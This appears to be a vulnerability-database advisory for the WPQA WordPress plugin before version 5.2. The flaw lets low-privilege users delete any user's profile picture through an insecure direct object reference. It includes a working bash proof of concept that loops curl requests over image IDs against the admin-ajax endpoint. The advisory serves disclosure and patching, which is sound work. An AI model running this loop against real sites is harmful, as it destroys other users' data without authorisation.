WordPress Plugin Vulnerabilities

WPQA < 5.2 - Subscriber+ Arbitrary Profile Picture Deletion via IDOR

Description

The plugin, used as a companion plugin for the Discy and Himer themes, does not validate that the value passed to the image_id parameter of the ajax action wpqa_remove_image belongs to the requesting user, allowing any users (with privileges as low as Subscriber) to delete the profile pictures of any other user.

Proof of Concept

#!/bin/bash
nonce=aae369a8e3
for i in {1..100000};
do
curl 'https://vulnerable.website/wp-admin/admin-ajax.php' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Cookie: something=something' --data-raw 'action=wpqa_remove_image&wpqa_remove_image='$nonce'&image_name=you_avatar&image_type=user_meta&meta_id=6723&image_id='$i;
done

Affects Plugins

Fixed in 5.2

References

Classification

Miscellaneous

Original Researcher
Binit Ghimire
Submitter
Binit Ghimire
Submitter website
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2022-04-21 (about 2 years ago)
Added
2022-04-21 (about 2 years ago)
Last Updated
2022-04-22 (about 2 years ago)

Other